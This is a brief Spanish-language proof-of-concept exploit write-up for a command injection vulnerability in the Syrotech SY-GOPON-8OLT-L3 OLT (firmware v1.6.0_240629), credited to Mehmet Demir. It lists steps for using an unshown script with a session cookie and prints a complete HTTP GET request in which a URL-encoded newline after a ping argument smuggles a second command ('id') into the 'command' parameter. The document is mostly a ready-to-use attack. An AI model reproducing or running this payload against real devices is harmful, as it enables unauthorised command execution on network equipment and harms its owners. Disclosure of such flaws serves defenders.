
Exploit de prueba de concepto para una vulnerabilidad de inyección de comandos en Syrotech SY-GOPON-8OLT-L3, que permite la ejecución arbitraria de comandos mediante la manipulación de solicitudes HTTP.
Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 Vulnerabilidad de Inyección de Comandos
1- Edita la URL en el script.
2- Edita el valor de Cookie_Login en el script.
3- Ejecuta el script, te permitirá ejecutar comandos.
GET /cgi/home.php?fun=system&page=shellCMDExec&isajax=1&runtab=1&cmdExec=1&command=ping%208.8.8.8%20-c%204%0aid&random=1725991418844 HTTP/1.1
Normalmente, solo se permite ejecutar el comando ping en el panel de administración.
Si interceptas la solicitud con un proxy, agrega un byte de nueva línea al final del parámetro command y escribe el comando que deseas ejecutar, te permitirá ejecutar otro comando.
Mehmet Demir